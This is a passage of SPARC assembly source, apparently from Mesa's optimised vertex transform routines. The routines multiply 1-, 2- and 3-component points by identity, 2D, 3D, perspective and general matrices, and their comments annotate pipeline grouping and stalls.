fmuls %f8, M0, %f9 ! FGM Group f1 available
fadds %f1, M12, %f1 ! FGA
st %f1, [%g2 + 0x00] ! LSU
fmuls %f8, M1, %f10 ! FGM Group f2 available
fadds %f2, M13, %f2 ! FGA
st %f2, [%g2 + 0x04] ! LSU
fmuls %f8, M2, %f11 ! FGM Group f3 available
fadds %f3, M14, %f3 ! FGA
st %f3, [%g2 + 0x08] ! LSU
fmuls %f8, M3, %f12 ! FGM Group f4 available
fadds %f4, M15, %f4 ! FGA
st %f4, [%g2 + 0x0c] ! LSU
fadds %f9, M12, %f9 ! FGA Group f9 available
st %f9, [%g2 + 0x10] ! LSU
fadds %f10, M13, %f10 ! FGA Group f10 available
st %f10, [%g2 + 0x14] ! LSU
fadds %f11, M14, %f11 ! FGA Group f11 available
st %f11, [%g2 + 0x18] ! LSU
fadds %f12, M15, %f12 ! FGA Group f12 available
st %f12, [%g2 + 0x1c] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
fmuls %f0, M0, %f1 ! FGM Group 1-cycle stall on %f0
fmuls %f0, M1, %f2 ! FGM Group
fmuls %f0, M2, %f3 ! FGM Group
fmuls %f0, M3, %f4 ! FGM Group
fadds %f1, M12, %f1 ! FGA Group
st %f1, [%g2 + 0x00] ! LSU
fadds %f2, M13, %f2 ! FGA Group
st %f2, [%g2 + 0x04] ! LSU
fadds %f3, M14, %f3 ! FGA Group
st %f3, [%g2 + 0x08] ! LSU
fadds %f4, M15, %f4 ! FGA Group
st %f4, [%g2 + 0x0c] ! LSU
3:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points1_identity
_mesa_sparc_transform_points1_identity:
cmp %o0, %o2
be 4f
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f1 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
st %f0, [%g2 + 0x00] ! LSU Group
cmp %o1, %o2 ! IEU1
st %f1, [%g2 + 0x10] ! LSU Group
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0
addx %g0, %g0, %g0
st %f0, [%g2 + 0x00]
3:
ba __set_v4f_1
nop
4: retl
nop
.globl _mesa_sparc_transform_points1_2d
_mesa_sparc_transform_points1_2d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_12_13(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f8 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f1 ! FGM Group
fmuls %f0, M1, %f2 ! FGM Group
fmuls %f8, M0, %f9 ! FGM Group
fmuls %f8, M1, %f10 ! FGM Group
fadds %f1, M12, %f3 ! FGA Group f1 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f2, M13, %f4 ! FGA Group f2 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f9, M12, %f11 ! FGA Group f9 available
st %f11, [%g2 + 0x10] ! LSU
fadds %f10, M13, %f12 ! FGA Group f10 available
st %f12, [%g2 + 0x14] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0
fmuls %f0, M0, %f1
fmuls %f0, M1, %f2
fadds %f1, M12, %f3
st %f3, [%g2 + 0x00]
fadds %f2, M13, %f4
st %f4, [%g2 + 0x04]
3:
ba __set_v4f_2
nop
.globl _mesa_sparc_transform_points1_2d_no_rot
_mesa_sparc_transform_points1_2d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_12_13(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f4 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f1 ! FGM Group
fmuls %f4, M0, %f5 ! FGM Group
fadds %f1, M12, %f3 ! FGA Group, 2 cycle stall, f1 available
st %f3, [%g2 + 0x00] ! LSU
st M13, [%g2 + 0x04] ! LSU Group, f5 available
fadds %f5, M12, %f6 ! FGA
st %f6, [%g2 + 0x10] ! LSU Group
st M13, [%g2 + 0x14] ! LSU Group
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0
fmuls %f0, M0, %f1
fadds %f1, M12, %f3
st %f3, [%g2 + 0x00]
st M13, [%g2 + 0x04]
3:
ba __set_v4f_2
nop
.globl _mesa_sparc_transform_points1_3d
_mesa_sparc_transform_points1_3d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_12_13_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f4 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f1 ! FGM Group
fmuls %f0, M1, %f2 ! FGM Group
fmuls %f0, M2, %f3 ! FGM Group
fmuls %f4, M0, %f5 ! FGM Group
fadds %f1, M12, %f1 ! FGA Group, f1 available
st %f1, [%g2 + 0x00] ! LSU
fmuls %f4, M1, %f6 ! FGM
fadds %f2, M13, %f2 ! FGA Group, f2 available
st %f2, [%g2 + 0x04] ! LSU
fmuls %f4, M2, %f7 ! FGM
fadds %f3, M14, %f3 ! FGA Group, f3 available
st %f3, [%g2 + 0x08] ! LSU
fadds %f5, M12, %f5 ! FGA Group, f5 available
st %f5, [%g2 + 0x10] ! LSU
fadds %f6, M13, %f6 ! FGA Group, f6 available
st %f6, [%g2 + 0x14] ! LSU
fadds %f7, M14, %f7 ! FGA Group, f7 available
st %f7, [%g2 + 0x18] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0
fmuls %f0, M0, %f1
fmuls %f0, M1, %f2
fmuls %f0, M2, %f3
fadds %f1, M12, %f1
st %f1, [%g2 + 0x00]
fadds %f2, M13, %f2
st %f2, [%g2 + 0x04]
fadds %f3, M14, %f3
st %f3, [%g2 + 0x08]
3:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points1_3d_no_rot
_mesa_sparc_transform_points1_3d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_12_13_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f2 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f1 ! FGM Group
fmuls %f2, M0, %f3 ! FGM Group
fadds %f1, M12, %f1 ! FGA Group, 2 cycle stall, f1 available
st %f1, [%g2 + 0x00] ! LSU
fadds %f3, M12, %f3 ! FGA Group, f3 available
st M13, [%g2 + 0x04] ! LSU
st M14, [%g2 + 0x08] ! LSU Group
st %f3, [%g2 + 0x10] ! LSU Group
st M13, [%g2 + 0x14] ! LSU Group
st M14, [%g2 + 0x18] ! LSU Group
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0
fmuls %f0, M0, %f1
fadds %f1, M12, %f1
st %f1, [%g2 + 0x00]
st M13, [%g2 + 0x04]
st M14, [%g2 + 0x08]
3:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points1_perspective
_mesa_sparc_transform_points1_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %g1, %o5, %g1 ! IEU0
ld [%g1 + 0x00], %f2 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f1 ! FGM Group
st %f1, [%g2 + 0x00] ! LSU
fmuls %f2, M0, %f3 ! FGM Group
st %g0, [%g2 + 0x04] ! LSU
st M14, [%g2 + 0x08] ! LSU Group
st %g0, [%g2 + 0x0c] ! LSU Group
st %f3, [%g2 + 0x10] ! LSU Group
st %g0, [%g2 + 0x14] ! LSU Group
st M14, [%g2 + 0x18] ! LSU Group
st %g0, [%g2 + 0x1c] ! LSU Group
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0
fmuls %f0, M0, %f1
st %f1, [%g2 + 0x00]
st %g0, [%g2 + 0x04]
st M14, [%g2 + 0x08]
st %g0, [%g2 + 0x0c]
3:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points2_general
_mesa_sparc_transform_points2_general:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_7_12_13_14_15(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f0, M1, %f3 ! FGM Group
fmuls %f0, M2, %f4 ! FGM Group
fmuls %f0, M3, %f5 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
fmuls %f1, M4, %f6 ! FGM
fadds %f3, M13, %f3 ! FGA Group f3 available
fmuls %f1, M5, %f7 ! FGM
fadds %f4, M14, %f4 ! FGA Group f4 available
fmuls %f1, M6, %f8 ! FGM
fadds %f5, M15, %f5 ! FGA Group f5 available
fmuls %f1, M7, %f9 ! FGM
fadds %f2, %f6, %f2 ! FGA Group f6 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, %f7, %f3 ! FGA Group f7 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f4, %f8, %f4 ! FGA Group f8 available
st %f4, [%g2 + 0x08] ! LSU
fadds %f5, %f9, %f5 ! FGA Group f9 available
st %f5, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points2_identity
_mesa_sparc_transform_points2_identity:
cmp %o2, %o0
be 3f
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %o1, 1, %o1 ! IEU0
ld [%g1 + 0x04], %f1 ! LSU Group
add %g1, %o5, %g1 ! IEU0
cmp %o1, %g3 ! IEU1
st %f0, [%g2 + 0x00] ! LSU Group
st %f1, [%g2 + 0x04] ! LSU Group
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0
2:
ba __set_v4f_2
nop
3: retl
nop
.globl _mesa_sparc_transform_points2_2d
_mesa_sparc_transform_points2_2d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_4_5_12_13(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x00], %f8 ! LSU Group
fmuls %f0, M1, %f3 ! FGM
ld [%g1 + 0x04], %f9 ! LSU Group
fmuls %f1, M4, %f6 ! FGM
fmuls %f1, M5, %f7 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f8, M0, %f10 ! FGM Group f2 available
fadds %f2, M12, %f2 ! FGA
fmuls %f8, M1, %f11 ! FGM Group f3 available
fadds %f3, M13, %f3 ! FGA
fmuls %f9, M4, %f12 ! FGM Group
fmuls %f9, M5, %f13 ! FGM Group
fadds %f10, M12, %f10 ! FGA Group f2, f10 available
fadds %f2, %f6, %f2 ! FGA Group f3, f11 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f11, M13, %f11 ! FGA Group f12 available
fadds %f3, %f7, %f3 ! FGA Group f13 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f10, %f12, %f10 ! FGA Group f10 available
st %f10, [%g2 + 0x10] ! LSU
fadds %f11, %f13, %f11 ! FGA Group f11 available
st %f11, [%g2 + 0x14] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f0, M1, %f3 ! FGM Group
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
fadds %f3, M13, %f3 ! FGA Group f3 available
fadds %f2, %f6, %f2 ! FGA Group 2 cycle stall, f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, %f7, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
3:
ba __set_v4f_2
nop
.globl _mesa_sparc_transform_points2_2d_no_rot
_mesa_sparc_transform_points2_2d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_12_13(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
ld [%g1 + 0x00], %f4 ! LSU Group
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x04], %f5 ! LSU Group
fmuls %f1, M5, %f3 ! FGM
fmuls %f4, M0, %f6 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f5, M5, %f7 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f6, M12, %f6 ! FGA Group f6 available
st %f6, [%g2 + 0x10] ! LSU
fadds %f7, M13, %f7 ! FGA Group f7 available
st %f7, [%g2 + 0x14] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f1, M5, %f3 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group, 2 cycle stall, f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
3:
ba __set_v4f_2
nop
/* orig: 12 cycles */
.globl _mesa_sparc_transform_points2_3d
_mesa_sparc_transform_points2_3d:
ld [%o2 + V4F_STRIDE], %o5
ld [%o2 + V4F_START], %g1
ld [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_12_13_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
ld [%g1 + 0x00], %f9 ! LSU Group
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x04], %f10 ! LSU Group
fmuls %f0, M1, %f3 ! FGM
fmuls %f0, M2, %f4 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group f2 available
fadds %f2, M12, %f2 ! FGA
fmuls %f1, M6, %f8 ! FGM Group f3 available
fadds %f3, M13, %f3 ! FGA
fmuls %f9, M0, %f11 ! FGM Group f4 available
fadds %f4, M14, %f4 ! FGA
fmuls %f9, M1, %f12 ! FGM Group f6 available
fmuls %f9, M2, %f13 ! FGM Group f2, f7 available
fadds %f2, %f6, %f2 ! FGA
st %f2, [%g2 + 0x00] ! LSU
fmuls %f10, M4, %f14 ! FGM Group f3, f8 available
fadds %f3, %f7, %f3 ! FGA
st %f3, [%g2 + 0x04] ! LSU
fmuls %f10, M5, %f15 ! FGM Group f4, f11 available
fadds %f11, M12, %f11 ! FGA
fmuls %f10, M6, %f0 ! FGM Group f12 available
fadds %f12, M13, %f12 ! FGA
fadds %f13, M14, %f13 ! FGA Group f13 available
fadds %f4, %f8, %f4 ! FGA Group f14 available
st %f4, [%g2 + 0x08] ! LSU
fadds %f11, %f14, %f11 ! FGA Group f15, f11 available
st %f11, [%g2 + 0x10] ! LSU
fadds %f12, %f15, %f12 ! FGA Group f0, f12 available
st %f12, [%g2 + 0x14] ! LSU
fadds %f13, %f0, %f13 ! FGA Group f13 available
st %f13, [%g2 + 0x18] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f0, M1, %f3 ! FGM Group
fmuls %f0, M2, %f4 ! FGM Group
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group f2 available
fadds %f2, M12, %f2 ! FGA
fmuls %f1, M6, %f8 ! FGM Group f3 available
fadds %f3, M13, %f3 ! FGA
fadds %f4, M14, %f4 ! FGA Group f4 available
fadds %f2, %f6, %f2 ! FGA Group stall, f2, f6, f7 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, %f7, %f3 ! FGA Group f3, f8 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f4, %f8, %f4 ! FGA Group f4 available
st %f4, [%g2 + 0x08] ! LSU
3:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points2_3d_no_rot
_mesa_sparc_transform_points2_3d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_12_13_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o3
be 2f
andn %g3, 1, %o2
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o3, 2, %o3 ! IEU0
add %g1, %o5, %g1 ! IEU1
ld [%g1 + 0x00], %f4 ! LSU Group
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x04], %f5 ! LSU Group
fmuls %f1, M5, %f3 ! FGM
fmuls %f4, M0, %f6 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f5, M5, %f7 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f6, M12, %f6 ! FGA Group f6 available
st M14, [%g2 + 0x08] ! LSU
fadds %f7, M13, %f7 ! FGA Group f7 available
st %f6, [%g2 + 0x10] ! LSU
st %f7, [%g2 + 0x14] ! LSU Group
st M14, [%g2 + 0x18] ! LSU Group
cmp %o3, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o3, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f1, M5, %f3 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group, 2 cycle stall, f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
st M14, [%g2 + 0x08] ! LSU Group
3: ld [%o1 + (14 * 0x4)], %g3
cmp %g3, 0
bne __set_v4f_3
nop
ba __set_v4f_2
nop
.globl _mesa_sparc_transform_points2_perspective
_mesa_sparc_transform_points2_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
add %o1, 1, %o1
add %g1, %o5, %g1
fmuls %f0, M0, %f2
st %f2, [%g2 + 0x00]
fmuls %f1, M5, %f3
st %f3, [%g2 + 0x04]
st M14, [%g2 + 0x08]
st %g0, [%g2 + 0x0c]
cmp %o1, %g3
bne 1b
add %g2, 0x10, %g2
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points3_general
_mesa_sparc_transform_points3_general:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_7_8_9_10_11_12_13_14_15(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M4, %f7 ! FGM Group
fmuls %f0, M1, %f4 ! FGM Group
fmuls %f1, M5, %f8 ! FGM Group
fmuls %f0, M2, %f5 ! FGM Group f3 available
fmuls %f1, M6, %f9 ! FGM Group f7 available
fadds %f3, %f7, %f3 ! FGA
fmuls %f0, M3, %f6 ! FGM Group f4 available
fmuls %f1, M7, %f10 ! FGM Group f8 available
fadds %f4, %f8, %f4 ! FGA
fmuls %f2, M8, %f7 ! FGM Group f5 available
fmuls %f2, M9, %f8 ! FGM Group f9,f3 available
fadds %f5, %f9, %f5 ! FGA
fmuls %f2, M10, %f9 ! FGM Group f6 available
fadds %f6, %f10, %f6 ! FGA Group f10,f4 available
fmuls %f2, M11, %f10 ! FGM
fadds %f3, M12, %f3 ! FGA Group f7 available
fadds %f4, M13, %f4 ! FGA Group f8,f5 available
fadds %f5, M14, %f5 ! FGA Group f9 available
fadds %f6, M15, %f6 ! FGA Group f10,f6 available
fadds %f3, %f7, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, %f8, %f4 ! FGA Group f4 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, %f9, %f5 ! FGA Group f5 available
st %f5, [%g2 + 0x08] ! LSU
fadds %f6, %f10, %f6 ! FGA Group f6 available
st %f6, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4
nop
.globl _mesa_sparc_transform_points3_identity
_mesa_sparc_transform_points3_identity:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
ld [%g1 + 0x08], %f2
add %o1, 1, %o1
add %g1, %o5, %g1
cmp %o1, %g3
st %f0, [%g2 + 0x00]
st %f1, [%g2 + 0x04]
st %f2, [%g2 + 0x08]
bne 1b
add %g2, 0x10, %g2
2:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points3_2d
_mesa_sparc_transform_points3_2d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_4_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f0, M1, %f4 ! FGM Group
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group
fadds %f3, M12, %f3 ! FGA Group f3 available
fadds %f4, M13, %f4 ! FGA Group f4 available
fadds %f3, %f6, %f3 ! FGA Group f6 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, %f7, %f4 ! FGA Group f7 available
st %f4, [%g2 + 0x04] ! LSU
st %f2, [%g2 + 0x08] ! LSU Group
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points3_2d_no_rot
_mesa_sparc_transform_points3_2d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M5, %f4 ! FGM Group
st %f2, [%g2 + 0x08] ! LSU
fadds %f3, M12, %f3 ! FGA Group
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, M13, %f4 ! FGA Group
st %f4, [%g2 + 0x04] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3
nop
.globl _mesa_sparc_transform_points3_3d
_mesa_sparc_transform_points3_3d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_4_5_6_8_9_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f0, M1, %f4 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group
fmuls %f0, M2, %f5 ! FGM Group f3 available
fmuls %f1, M6, %f8 ! FGM Group f6 available
fadds %f3, %f6, %f3 ! FGA
